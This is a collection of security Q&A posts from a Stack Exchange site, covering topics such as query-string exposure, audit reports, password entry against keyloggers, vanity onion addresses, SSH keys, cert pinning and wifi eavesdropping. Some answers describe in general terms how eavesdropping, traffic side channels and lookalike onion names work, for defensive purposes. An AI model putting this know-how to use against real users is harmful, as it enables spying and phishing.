Columns: source_id (int64, 1 - 4.64M) · question (string, 0 - 28.4k chars) · response (string, 0 - 28.8k chars) · metadata (dict)
29,598
Should sensitive data ever be passed via the query string as opposed to the POST request? I realize that the query string will be encrypted, but are there other reasons to avoid passing data in the query string, such as shoulder surfing?
If the query string is the target of a user-clickable link (as opposed to a URL used from some Javascript), then it will appear in the URL bar of the browser when the corresponding page is loaded. That raises the following issues:

- The URL will be displayed. Shoulder surfers may see it and learn things from it (e.g. a password).
- The user may bookmark it. This can be a feature, but it also means that the data gets written to disk.
- Similarly, the URL will make it into the browser "history", so it will be written to disk anyway and might be retrieved afterwards. For instance, if the browser is Chrome, then a lunch-time attacker just has to type Ctrl+H to open the history tab and obtain all the query strings.
- If the page is printed, the URL will be printed, including any sensitive information.
- URLs, including their query strings, are also frequently logged on the web server, and those logs may not be secured appropriately.
- There are size limitations on the query string, which depend on the browser and the server (there is nothing really standard here, but expect trouble beyond about 4 kB).

Therefore, if the query string is a simple link target in an HTML page, then sensitive data should be transmitted as part of a POST form, not encoded in the URL itself. With programmatic downloads (the AJAX way), this is much less of an issue.
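To make the distinction concrete, here is a minimal Python sketch using the third-party requests library; the URL and the "pin" field are placeholders, not taken from any real application. Both requests can travel over HTTPS, but only the GET variant leaves the value in browser history, bookmarks, proxy logs and server logs.

```python
import requests

url = "https://example.com/account"  # hypothetical endpoint

# GET: the value becomes part of the URL (?pin=...), so it ends up in
# history, server logs and possibly the Referer header of outgoing links.
requests.get(url, params={"pin": "1234"})

# POST: the same value travels in the request body instead of the URL.
requests.post(url, data={"pin": "1234"})
```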
{ "source": [ "https://security.stackexchange.com/questions/29598", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1678/" ] }
29,642
Background I'm in charge of auditing a medium-scale web application. I have audited web applications several times before, but I've always written a short PDF quickly explaining what I encountered and usually I'm the one who's gonna be fixing those vulnerabilities so I never cared for the actual content of the report. In my current job things are done in a more organized fashion. First I have to write the report, then the project manager will review it, then he'll decide whether I'll be the one to fix the issues or someone else. Question What should such report contain? I'm looking for a general outline of how it should be organized. Update : Because I couldn't find anything here on Security.SE about audit reports, I decided to make this question a bit broader and include any kind of security audit rather than just web applications. I think it'll be useful to more people in this case.
There are a couple of ways that I've seen this done, each with its pros and cons. As noted by @RoryAlsop below, a common point for both approaches is that the executive summary should, as much as possible, be written for a business audience (assuming that it's a test you're doing for a 3rd party or the report will be passed to management).

Reporting by finding. Here you list the findings, usually ranked by severity (e.g. CVSS score or some other scale like severity/likelihood). You then list out the technical details of the finding and potential mitigations if you have that information. This kind of report gets to the point quite quickly and plays well with tool output.

Reporting by methodology. Assuming that you're following a defined testing methodology, the report is structured along the lines of the methodology and includes a section for each area of the review. The sections detail what testing was done and the outcome (either a finding, or the fact that there was no finding in this area). The advantage here is that you're showing your workings, so someone reading the report can see that you actually tested something and it was OK, rather than you just having missed it out. The downside is that it tends to be a longer report and is harder to automate. One other gotcha is that you need to make sure that the testers don't just follow the methodology but actually engage their brains to look for other things.

In terms of format for the findings, I usually include the following:

- Title (descriptive; it gets used in the summary table and linked to the detail)
- Description - a technical description of what the issue is and, importantly, under what circumstances it is likely to cause a security issue (e.g. for Cross-Site Scripting, one of the potential issues is its use to grab session tokens, which could allow an attacker to get unauthorised access to the application)
- Recommendations - how the issue should be resolved; where possible include specific details on vendor guidance to fix it (e.g. things like removing web server versions from headers have specific instructions for Apache/IIS etc.)
- References - any links to additional information that's relevant to the finding (e.g. links to the relevant OWASP page for web app issues)
- Severity - as mentioned above, this could be CVSS or something more general like High/Medium/Low based on impact and likelihood
- Other classification as needed by the client - for instance, some clients might need things lined up against a standard or policy, or something like the OWASP Top 10

One other point: if you do a lot of tests, it's well worth having a database of previous findings to avoid having to look up references repeatedly and to make sure that severities are consistent.
{ "source": [ "https://security.stackexchange.com/questions/29642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16228/" ] }
29,742
I just saw for the first time a new way to enter a password, at the Banque Postale (French Bank). You are given a virtual numeric keyboard and to type you can just leave the mouse cursor over a number for what seems like 1 second for it to be entered. At first this seems pretty nice, you don't have keyboard strokes to record, nor mouse clicks. Yet, I have the uncanny impression that there might be a problem with this system. The obvious one is that you are only allowed to put numbers in your password, would there be anything else?
These kinds of password entry systems are only good as long as the attackers do not adapt. It is a play in several acts:

1. Bank Web sites use passwords which are entered the traditional way, with a keyboard. Key loggers appear, and harvest key strokes.
2. After some cases of actual bank password theft, banks adapt. They implement "visual keyboards" in which the user clicks on buttons labeled with letters or digits.
3. After some time, attackers adapt. New-generation key loggers also record mouse click coordinates. These coordinates are sufficient to recompute the password.
4. After some time, banks adapt. They now "shuffle" the labeled buttons so that they do not always show up at the same place on the screen. Mouse click coordinates are no longer sufficient to recompute the password.
5. After some time, attackers adapt. Next-generation key loggers take local screen shots, recording the pixels around the point where the user clicked. The screen shots are sufficient to recompute the password.
6. After some time, banks adapt. Instead of clicks, the bank's Web site reacts to "hovering" without an actual click. The current key logger generation does not record hovering, only clicks, so it is defeated.

As you observe, we are currently at that point. Can you guess what is going to happen? This is an arms race. The attackers force the banks to apply more convoluted password entry methods; the banks train attackers into defeating increasingly "secure" password entry methods. Simultaneously, banks try to train their customers into dealing with more complex password entry methods. In the long term, my bet is that attackers will evolve faster than customers; the banks are fighting a losing battle.
{ "source": [ "https://security.stackexchange.com/questions/29742", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2976/" ] }
29,772
.onion addresses normally should be made of a base32 string of the first 80 bits of the SHA1 hash of the private key of the server (see .onion address specification ). Today I ran into a service which clearly doesn't have an arbitrary address: http://sms4tor3vcr2geip.onion/ How does that work and is it secure?
Shallot is an older program, there are newer alternatives available now: Scallion - uses GPU hashing, needs .NET or Mono: http://github.com/lachesis/scallion Eschalot - uses wordlist search, needs Unix or Linux: http://blacksunhq56imku.onion Eschalot can find longer human-readable names like seedneedgoldcf6m.onion, hostbathdarkviph.onion, etc. The performance chart quoted above is a bit obsolete now, 8-10 character long .onions are easy enough to find. There was a discussion back in the day, when shallot first surfaced, about whether custom names for hidden services are bad or not. Problem number one: generated keys have a much larger public exponent than the standard keys produced by TOR, which puts a somewhat higher load on the TOR relays. Answer: it was concluded that the difference is negligible compared to the other encryption tasks the relays perform constantly. In eschalot, the largest public exponent is limited to 4294967295 (4 bytes). Problem number two: TOR developers can decide to filter and block all the custom names. Answer: yes, they can, but they have not yet and there is really no reason for them to do so. They can just as easily change the standard for the random names too and cause chaos and mass exodus on the network. Problem number three: generated names are easily spoofed, since the visitor clicking on a link somewhere out there can be tricked by the seemingly right .onion prefix without checking the whole thing. To demonstrate, which one is the real SilkRoad? silkroada7bc3kld.onion silkroadqksl72eb.onion silkroadcqgi4von.onion silkroady3c2vzwt.onion silkroadf3drdfun.onion silkroadbdcmw7rj.onion Answer: neither, I generated all of them to demonstrate the problem. If you recognized that those were all fakes, you probably spend more time on the SilkRoad than I care to know about :). To be fair, completely random addresses are even worse - if somebody edits one of the onion links wikis and replaces one random address with another, the casual visitor using that wiki would not know the difference. Solution: it's essentially up to the person to pay attention which site he is really visiting, but the site owner can create a human readable address that is easier to remember, even if it's a completely random gibberish. As long as it's long and easy to memorize and identify. Some examples: fledarmyusertvmu.onion wifefeelkillwovk.onion ladyfirehikehs66.onion woodcubabitenem2.onion I did not spend the time to intentionally generate good names, just picked some from the list I had left after testing eschalot. With a (very) large wordlist, unique looking names are easy to generate, but it will take time to go through the results and manually locate the ones that are decent. Well, that was my opinion and it could be wrong. -- Hiro
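For background on what these generators are searching for, here is a rough Python sketch of the v2 address derivation the question describes: base32 of the first 80 bits of a SHA-1 hash over the service's DER-encoded RSA public key. The random bytes fed to the demo are a stand-in for a real key, and tools like Shallot/Scallion/Eschalot simply search over many candidate keys (Shallot famously varies the RSA public exponent, which is why the answer mentions larger exponents) until the derived string starts with the wanted prefix.

```python
import base64
import hashlib
import os

def onion_v2_address(public_key_der: bytes) -> str:
    # First 80 bits (10 bytes) of SHA-1 over the DER-encoded key,
    # base32-encoded and lower-cased, gives the 16-character v2 name.
    digest = hashlib.sha1(public_key_der).digest()
    return base64.b32encode(digest[:10]).decode().lower() + ".onion"

# Random stand-in bytes instead of a real RSA key, just to show the output shape.
print(onion_v2_address(os.urandom(140)))
```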
{ "source": [ "https://security.stackexchange.com/questions/29772", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
29,806
Every once in a while I have to set up an account on a site that, while apparently at least not storing my password in plaintext, still forces me to choose from a limited set of security questions that can be used for password recovery purposes. Since the questions are usually moronically easy to answer by some googling or social engineering (à la "What's your mother's maiden name?"), what is the correct approach when I cannot avoid using this account?
"Security questions" are just an alternative password which is not used often, but which, presumably, will not be forgotten by the user. Since it is a password-equivalent information, treat it as such: use true, high-entropy passwords as answers to security questions. Of course, since you will not enter these often, you should write them down on a paper, stored in a safe place (they are meant to be used as a backup for the "true" password; you do not need them often). (Note: most systems will handle responses to security questions in a case-insensitive way, which decreases the "entropy" of that password -- hence, make it even more random. 15 random letters would be enough.)
{ "source": [ "https://security.stackexchange.com/questions/29806", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
29,851
I am learning how to use OpenPGP keys in GnuPG, and I am wondering what is the threshold people generally use to maintain separate OpenPGP keys. Maintaining an incredibly large number of keys is not good since it makes it difficult to be trusted by others. On the other hand, my feeling is, maintaining a single key may not be able to keep separate things separate. How many keys are okay? How many are too much?
In general, one key per identity should be fine. One key can include:

- Several UIDs (for separate mail addresses, ...)
- Several subkeys (for different devices, so you can put some subkey on your mobile; if it gets lost, revoke only this)

Advantages

- Less hassle when signing keys, interacting with keyservers, cross-signing your keys
- Less hassle maintaining your keys, including moving to other computers, revocation certificates, ...
- Less hassle when actually using it
- Less pollution: if somebody wants to use your public key, it's easier to find the correct one as they're grouped in a semantic way. Imagine looking for a person's name and finding a dozen keys for all his different addresses in use, which to use for encryption?

On having multiple keys anyway

If you want to manage multiple IDs which shall not be connected directly (I can imagine a personal one, one at your employer, one for stuff which may not contain your real name - I think of governmental pressure, ...), feel of course free to use multiple primary keys.

Limitations of Subkeys

- Others encrypting for you will always choose the newest subkey. There is no way to connect subkeys to specific user IDs (for example, to have different subkeys for work and home). This would be a good reason for using multiple primary keys (also, your employer might be able to require the private key, depending on your local legislation). This is not valid for signing subkeys: each computer will just use the subkey that is available; if you only distribute the specific subkey, you can easily enforce a given subkey.
- GnuPG can only merge different sets of private subkeys for a primary key starting from version 2.1. Make sure to have all subkeys on a single machine and export as needed, or upgrade GnuPG. There is a way using gpgsplit and cat, but it is tedious and requires deep knowledge of RFC 4880 (the OpenPGP specification).

Creating and Exporting Subkeys

Subkeys are generated by running gpg --edit-key [key-id] for the primary key, and then starting the subkey generation assistant with the addkey command (don't forget to save afterwards). To export a subkey (or set of subkeys), run gpg --export-secret-subkeys [subkey-id]! >subkey.pgp -- do not forget the exclamation mark !, otherwise GnuPG will resolve the subkey to the associated primary key (and export this one instead). You can import it using the normal gpg --import [file] command. I strongly recommend Debian's document on subkeys for further reading.
{ "source": [ "https://security.stackexchange.com/questions/29851", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
29,876
I have learned there are 2 methods to make SSH remote login easier and more secure; those are:

- SSH-generated keys (using ssh-keygen) -- OpenSSH keys
- PEM (.pem) keys, usually generated with OpenSSL (Amazon Web Services uses this method) -- OpenSSL

My question is: what are the differences between these 2 methods, which one is more secure, and why is it more secure?
The file format is different but they both encode the same kind of keys. Moreover, they are both generated with the same code: openssl (the command-line tool) is a wrapper around OpenSSL (the library), and OpenSSH actually uses OpenSSL (the library) for its cryptographic operations, including key pair generation. So there is no direct security difference. We could argue a bit about password-based encryption of the private keys, but there is nothing really significant here.
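As a rough illustration of "same keys, different container", the sketch below uses the third-party cryptography package (an assumption; it is not mentioned in the answer, and a recent version of the package is assumed) to serialize one freshly generated RSA public key in both OpenSSH and PEM form, then parse both back to identical key material.

```python
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import (
    Encoding, PublicFormat, load_pem_public_key, load_ssh_public_key,
)

# One RSA key pair, of the kind either tool would produce.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

ssh_blob = key.public_key().public_bytes(Encoding.OpenSSH, PublicFormat.OpenSSH)
pem_blob = key.public_key().public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)

# Different on-disk formats, identical modulus and exponent underneath.
assert (load_ssh_public_key(ssh_blob).public_numbers()
        == load_pem_public_key(pem_blob).public_numbers())
```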
{ "source": [ "https://security.stackexchange.com/questions/29876", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20155/" ] }
29,885
The company I'm working for is about to undergo a PCI compliance on-site assessment. The PCI DSS has a kind of checklist, but it is all very vague and abstract to me, so I'm not quite sure what I need to have prepared for the QSA when he comes. More specifically, I'd like to know what exactly the QSA asks for in terms of documents, software, configuration files, scripts etc. In the case of documents, how detailed should the information be? Just general guidelines, or specific procedures for each item? For example, is it acceptable to write only something like this in my policy document? "Procedures must include periodic media inventories in order to validate the effectiveness of these controls." Or should I provide details about what these procedures are, who will perform them, how long the mentioned period is, etc.?
{ "source": [ "https://security.stackexchange.com/questions/29885", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20152/" ] }
29,951
Most discussions involving access credentials include references to "hashing salted passwords". Is this another way of referring to the HMAC algorithm, or a totally different operation? Different or not, why not use HMAC, since it is easily referenced to a published standard, FIPS 198?
HMAC is a Message Authentication Code , which is meant for verifying integrity . This is a totally different kind of beast. However, it so happens that HMAC is built over hash functions, and can be considered as a "keyed hash" -- a hash function with a key . A key is not a salt (keys are secret, salts are not). But the unique characteristics of HMAC make it a reasonable building block for other functions, which is what happens in PBKDF2 : that's a key derivation function, commonly subverted into password hashing (a role for which it appears to be adequate). PBKDF2 includes a salt , and internally invokes HMAC (several times). Good password hashing must be slow (in a configurable way) and include a salt . These characteristics are not easily obtained, and you will not get them out of a lone HMAC (which is fast and does not use a salt).
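A short Python sketch of that last point, using the standard library's PBKDF2 implementation: the salt is random and stored alongside the hash, and the iteration count provides the configurable slowness (the specific count here is just an illustrative value, not a recommendation from the answer).

```python
import hashlib
import os

password = b"correct horse battery staple"
salt = os.urandom(16)   # public, per-user randomness
iterations = 600_000    # tunable work factor: higher means slower, which is the point

# PBKDF2 iterates HMAC-SHA-256 under the hood: HMAC as a building block,
# not as the password hash itself.
derived = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
print(salt.hex(), derived.hex())
```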
{ "source": [ "https://security.stackexchange.com/questions/29951", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10923/" ] }
29,988
I'm superficially familiar with SSL and what certs do. Recently I saw some discussion on cert pinning but there wasn't a definition. A DDG search didn't turn up anything useful. What is certificate pinning?
Typically certificates are validated by checking the signature hierarchy; MyCert is signed by IntermediateCert which is signed by RootCert , and RootCert is listed in my computer's "certificates to trust" store. Certificate Pinning was where you ignore that whole thing, and say trust this certificate only or perhaps trust only certificates signed by this certificate , ignoring all the other root CAs that could otherwise be trust anchors. It was frequently also known as Key Pinning, since it was actually the public key hash that got saved. But in practice, Key Pinning turned out to cause more problems than it solved. It was frequently misconfigured by site owners, plus in the event of a site compromise, attackers could maliciously pin a cert that the site owner didn't control. Key Pinning was deprecated in 2017, and was removed entirely from Chrome and Firefox in Nov. 2019. It was never supported to begin with by IE and Safari. The recommended replacement is to use the Expect-CT header to tell browsers to require that the cert show up in Certificate Transparency logs.
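For context on what was actually being "pinned", here is a small sketch that computes the base64 SHA-256 of a server certificate's SubjectPublicKeyInfo, the kind of value HPKP pins contained. It fetches the live certificate and uses the third-party cryptography package, both assumptions on my part rather than anything the answer prescribes.

```python
import base64
import hashlib
import ssl

from cryptography import x509
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def spki_sha256_pin(host, port=443):
    # Fetch the leaf certificate presented by the server...
    pem = ssl.get_server_certificate((host, port))
    cert = x509.load_pem_x509_certificate(pem.encode())
    # ...and hash its DER-encoded public key info, as key pins did.
    spki = cert.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
    return base64.b64encode(hashlib.sha256(spki).digest()).decode()

print(spki_sha256_pin("example.com"))
```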
{ "source": [ "https://security.stackexchange.com/questions/29988", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56974/" ] }
30,091
I realize this question may be quite broad (and hopefully not a violation of the FAQs), but I'm interested in hearing how those of you out there handle a computer infected with malware. In a small-to-medium business (heck, even large businesses like the New York Times), acquiring malware seems like an inevitability. Despite putting checks and balances in place (updated workstations with security patches/Java/Flash, up-to-date anti-virus software, spam filters, etc.), viruses still penetrate through the cracks and some are able to execute. My question is not so much about the prevention of viruses, but rather what you do with a workstation after it's been discovered that it has been compromised. Obviously we'd all feel more comfortable with the old NIFO stance, however many of us are strapped for resources and don't have time to always be re-imaging machines, especially if the bugs show only with "on-demand scans" and don't appear to have executed. I'm curious as to what others in my situation are doing once a machine is found to be compromised. Is a "revert to old restore point and on-demand scan in safe mode" enough, or do you guys always re-image a machine?
Nuke it from orbit. The only way to be sure it is gone once it is compromised is to blow it away entirely. Restore checkpoints only help for configuration issues; a virus can alter previous configurations or install itself in such a way that it survives a restore. If it's just adware, then removal may be sufficient, but viruses can be very sneaky. It might be possible to get rid of it completely, but it will take more time (days) than nuking and rebuilding in most cases, particularly if regular backups are kept. Edit: As Oleg was kind enough to point out, if you're re-imaging from a hidden partition on the computer, it is possible that the image could have also been infected. It's also possible that the BIOS (or other firmware in hardware) could have been infected in very rare cases, in which case you are looking at a major pita to get rid of it. Luckily 99.99% (my approximation) of the time, it isn't hardware-resident yet.
{ "source": [ "https://security.stackexchange.com/questions/30091", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4386/" ] }
30,149
Sometimes I need to use a public PC to access my Gmail account. Is there a safe way to log in and keep my password safe in case there is a keylogger or a trojan on that PC? Are there tools that could help in that case?
Enable two-factor authentication. Consider the remembered password compromised to any user of the public computer. EDIT: My answer dealt with how to prevent your password from being keylogged. With two-factor authentication your password is now the combination of a randomly generated one-time-use code (obtained via cell phone or a pre-obtained list) as well as the remembered password; hence a keylogger doesn't give an attacker the ability to log in as you for a future attack. However, I definitely agree with TomLeek and Nic that in a real-time attack (not a keylogger looked at after the fact) that captures your random session token (which indicates to Gmail that you are signed in before you do any action), an attacker can fully use your Gmail account (send emails as you; search through emails sent to you; delete your emails; etc.). Granted, once you log out, your session token will become invalidated and will kick them out of your account. Granted, a clever attacker could write a browser plugin to collect your session tokens, send them to the attacker, and then redirect the logout page to not actually invalidate your token. Though you could always log in to Gmail again, view the link for "Last account activity [Details]" and sign everyone else out.
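To illustrate what the second factor typically is, here is a rough standard-library sketch of RFC 6238 TOTP, the algorithm behind authenticator-app codes; the base32 secret shown is a made-up example, not tied to any real account.

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, digits=6, period=30):
    """RFC 6238: HMAC-SHA1 over a 30-second time counter, then truncate."""
    key = base64.b32decode(secret_b32.upper())
    counter = struct.pack(">Q", int(time.time()) // period)
    digest = hmac.new(key, counter, "sha1").digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # example secret only
```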
{ "source": [ "https://security.stackexchange.com/questions/30149", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20309/" ] }
30,246
Every so often I get a phone call from a company: my bank, utility companies, etc. Many times they are just cold calling me, but once or twice they were calling for legitimate reasons (i.e., something to do with my account). The problem is, all these companies ask you to confirm your personal details, like date of birth. Now I have no way of knowing whether the person calling me is really from the company or some phisher (because even if the call isn't from a blocked number, it's just a number and I have no way of knowing who owns it). Usually, when they ask me for personal details to prove my identity, I tell them that since they called, they should prove their identity. At this point they usually get irate and warn me that they cannot go ahead for security reasons. Now I don't want to miss out on important calls, but neither do I want to give out my personal info to anyone who manages to find my phone number. Is there a proper way to deal with such calls?
I react exactly the same way as you: I first ask them to authenticate themselves to me; after all, they called me. If they can't or won't, I tell them that I will call my bank manager/utility rep/whatever, and that if this is an official message I should be able to receive it after authenticating the usual way. Don't give in to them: they need motivation to start doing this right.
{ "source": [ "https://security.stackexchange.com/questions/30246", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20368/" ] }
30,261
If someone knows my wifi password (be it WEP or WPA) what can they see? Do they just see URLs I visit, or can they see everything in my browser, or even everything I do on my computer? Does using HTTPS make any difference? Secondly, If the attacker does not live nearby, is it possible for them to set up a laptop in my neighbour's house and record all my traffic or otherwise relay the data via the web?
If someone knows my wifi password (be it WEP or WPA) what can they see on my screen? Do they just see URLs I visit, or can they see everything in my browser,....or can they see everything I do on my computer? Does using HTTPS make any difference? They can't see anything on your screen (unless you've enabled some sort of unencrypted remote desktop screen sharing program). They can, however, observe all the data being sent to and from your computer (I'm assuming for WPA/WPA2 they observed the 4-way handshake at the beginning of each session; or trivially forced your computer to start another handshake), unless you encrypted that data using a protocol like HTTPS. They would typically run a packet capture program like wireshark to decrypt the wifi encryption. Again, they'd be able to see what HTTP webpages you requested, what links you click, the HTML content of the webpages you requested, any information you post to a web site, as well as all data (e.g., any images/movies) sent to you or by you. They can also interfere with the traffic being sent to you (e.g., alter the content you see). Granted anyone nearby can always interfere and cause denial of wifi service without knowing your password (e.g., often turning on a microwave oven will interfere with all wifi traffic being sent to you). Or have their own computer/router that they fully control that sends impersonated messages as you or your router. If you visit HTTPS sites only, they can't decrypt the data (unless they have somehow additionally compromised your computer). However, even with HTTPS they can see what IP addresses you are sending/getting data from (which usually will let them tell what domain e.g. if you went to 69.59.197.21 it's stackexchange.com ). They also will know when and how much encrypted data is being sent. This is possibly enough to give away private information. Imagine you went to a webpage via HTTPS that had results of your HIV test, and an eavesdropper was listening. If the web page for a negative result showed 3 images (of specific sizes) and a 10 MB PDF file on safe sex, while the page for positive results had 15 images and three PDF files that were 8MB, 15MB, and 25 MB respectively you may be able to figure out what their results were by observing how much data was sent and when. This style of attack has been used to figure out what people were searching for on a popular search engine (from the instant results provided for different queries) or roughly estimate what kind of income someone had at an https tax site. See Side-Channel Leaks in Web Applications (pdf) . Granted all this information is also available to your ISP as well and to every intermediary router between your computer and the server you are trying to visit. Secondly, if the attacker does NOT live nearby, is it possible for them to set up a laptop in my neighbours house for example, and programatically record all my traffic...or alternatively can they relay the data from the laptop to their own computer elsewhere, via the web? Either is trivial to program up assuming your neighbor doesn't mind them putting a laptop in their house (or they found a power source and place to hide their computer).
{ "source": [ "https://security.stackexchange.com/questions/30261", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20378/" ] }
30,310
I've found out that if you download a file with Firefox, a window similar to this one pops up (in Dutch in my case): ("Bestand opslaan" = "Save file") However, the file is already being downloaded before I press the OK button (i.e. I waited 1 minute before clicking on the OK button and already 50 MB of 191 MB had been downloaded). Does this feature come with any security risks (a malicious file could be downloaded before I even had the chance to click Cancel), and should I find a way to disable it, or is this perfectly safe?
Technically, the popup does not ask you whether you really want to download the file; that decision you already took when you clicked on the link which triggered the download. The popup asks you what Firefox should do with the file when it has been fully downloaded. Potentially hostile files can be a security issue. Filesystems normally store files as a bunch of bytes and are thus nominally immune to the file contents; but modern operating systems are not content with handling files as files. For instance, if you open a file explorer to see the directory in which downloaded files are stored, and the file has a name which ends in '.jpg' or '.png', then the file explorer will try to interpret the file contents automatically, as a picture, so as to compute and display a miniature view of the said picture. Any security hole in the JPEG or PNG support library could then be exploited by a malicious file, and it does not require any "opening click" on the file, just opening the directory. The Web is a harsh place.
{ "source": [ "https://security.stackexchange.com/questions/30310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10817/" ] }
30,362
Most antiviruses have hundreds of thousands or even millions of malware signatures, and yet they scan many files in a reasonably short time with high detection rates. Even real-time scanners don't slow the computer down noticeably but provide strong protection against threats. How can scanners achieve this kind of performance? I know it could be a broad question, but I wanted to get a general idea about this.
Antivirus detection is a feature extraction and a classification problem . A great analogy is the 20 questions game where the goal is to identify an arbitrary object by asking 20 seemingly unrelated yes/no questions. The idea behind the game is that each answer would eliminate half of the objects so it is theoretically possible to describe 2^20 (1,048,576) objects with only 20 binary features. A different analogy is how the visual cortex processes visual information. The brain has very simple and fast hardware for detecting and classifying an infinite number of images. Only six layers of neurons (the number of neurons is estimated at 140 million) are used to extract progressively more complex features and pass them on to the next layer. The layers interact back and forward to each other to produce abstract notions that can be verified against memory. Antivirus engines store many features of known malware in the definition file and when they scan a new file they optimize the extraction and classification (matching) of those features. Storing features also makes the detection more robust so that small changes in a piece of malware won't thwart detection. Feature extraction is also done in parallel so that resources are fully utilized. Most features are designed by humans but there are some that do not make sense by themselves, like having a null byte at the end of the file or a ratio between file size and printable text size. Those nonsensical or unintuitive features are randomly generated and tested by data mining vast quantities of files. In the end the file is described and classified by the combination of features. As a side note, the best predictor for questions being closed on Stack Exchange is whether the first letter of the question is in lower case. So when a new file is scanned, it is quickly classified into finer and finer categories and then it is matched against a small set of signatures. Each step would exclude a large number of clean files and would dictate what other features should be extracted next. The first steps are very small in terms of computing resources but they dictate which more expensive steps should be taken later. By using only a few disk reads and CPU cycles the engine can determine the file type. Let's say it is a JAR file. Using this information, it starts collecting features of the JAR file. If it's signed, then the scan is aborted. If it's not importing any functions then the scan is aborted (I'm oversimplifying here). Is it using any tricky functionality? then more features should be extracted. Does it use known vulnerable functions? Then it should be thoroughly checked for known Java exploit signatures. On-access scanning has the same principle behind but it also works like a gatekeeper. So each action (usually API call) taken by a process is being checked for and allowed or denied. Similarly, each suspicious action triggers more filters and more checks. During the checks the process or thread is waiting for the operation to complete but sometimes the whole process is actively suspended. This might look like significant overhead but once a specific action is verified, it is later cached and performed very quickly or not performed at all. The result is a performance degradation similar to having a machine a couple of percentage points slower. Check the PCMark scores for 20 AV products here . So the speed optimization comes from very little work being performed on clean looking files which constitute the overwhelming majority of scanned files. 
The heavy lifting work is being done only on suspicious malware-looking files for which AV might even take seconds to emulate the process or even send it to the cloud for analysis. The magic is in the progressive classification.
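As a toy illustration of that progressive-classification idea, here is a Python sketch; the file types, checks and verdicts are invented for the example and are not taken from any real engine.

```python
def scan(path):
    # Cheapest check first: a tiny read to classify the file type.
    with open(path, "rb") as f:
        header = f.read(4)

    if header.startswith(b"MZ"):           # looks like a Windows executable
        return deep_scan_executable(path)  # only now pay for expensive work
    if header.startswith(b"%PDF"):         # looks like a PDF
        return deep_scan_pdf(path)

    return "clean"                         # most files never get past this point

def deep_scan_executable(path):
    # Placeholder for signature matching, emulation, cloud lookups, ...
    return "needs signature check"

def deep_scan_pdf(path):
    return "needs exploit check"
```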
{ "source": [ "https://security.stackexchange.com/questions/30362", "https://security.stackexchange.com", "https://security.stackexchange.com/users/8396/" ] }
30,396
I do not mean simply putting the public RSA key of an X.509 certificate into ~/.ssh/authorized_keys -- I'm looking for a way to set up SSH such that X.509 certificates signed by a pre-defined CA will automatically be granted access to the linked user account. RFC 6187 seems to suggest such a functionality, but I can't find any documentation on this, or whether it is implemented in OpenSSH at all. Here's a more elaborate description of what I want to do:

- A CA ("SSH-CA") is set up.
- This CA is used to sign user certificates with keyUsage=digitalSignature (and maybe the id-kp-secureShellClient extendedKeyUsage field).
- This certificate can now be used to log in on a server. The server does not require the public key to be present in authorized_keys. Instead, it is set up to trust the SSH-CA to verify the public key and signature of the certificate (or certificate chain) and the username/UID (probably directly in the subjectAltName field, or maybe using some server-side mapping) before the usual RSA authentication takes place.

So, (how) can this be achieved with OpenSSH, and if it requires a patch, how can client-side modifications be kept minimal? As an alternative, I guess one could also use any S/MIME certificate plus a username-to-email-address mapping, without requiring a CA of our own. The client could also still use only the private RSA key, and a certificate server would be used to obtain a certificate from a public key, additionally offering the possibility to use PGP certificates as well (e.g. via monkeysphere) without the user requiring any knowledge about all this, as long as they simply provide a public key. If it's not natively possible, I guess I could come up with a semi-automatic "implementation" of this by letting a script on the server automatically check a certificate submitted through some other channel via openssl (or gnupg) and have the public key put into the respective user's authorized_keys file -- although at that point I am probably more or less re-doing the monkeysphere project ...
OpenSSH does not officially support x.509 certificate based authentication: The developers have maintained a stance that the complexity of X.509 certificates introduces an unacceptable attack surface for sshd. Instead, they have [recently] implemented an alternative certificate format which is much simpler to parse and thus introduces less risk. ... OpenSSH just uses the low-level cryptographic algorithms from OpenSSL. However Roumen Petrov publishes OpenSSH builds that do include X.509 support , and you could try with those. X.509 certificates can [be] used as "user identity" and/or "host key" in SSH "Public Key" and "Host-Based" authentications. Roumen Petrov's builds can be downloaded via this page . Here's a Debian how-to for SSH with authentication key instead of password that might also prove useful in setting up your OpenSSH to accept x509 PKI for user authentication.
{ "source": [ "https://security.stackexchange.com/questions/30396", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
30,403
When hosting a cluster of web application servers it’s common to have a reverse proxy (HAProxy, Nginx, F5, etc.) in between the cluster and the public internet to load balance traffic among app servers. In order to perform deep packet inspection, SSL must be terminated at the load balancer (or earlier), but traffic between the load balancer and the app servers would be unencrypted. Wouldn't early termination of SSL leave the app servers vulnerable to packet sniffing or ARP poisoning? Should SSL be offloaded? If so, how can it be done without compromising the integrity of the data being served? My main concern is for a web application where message layer encryption isn't an option.
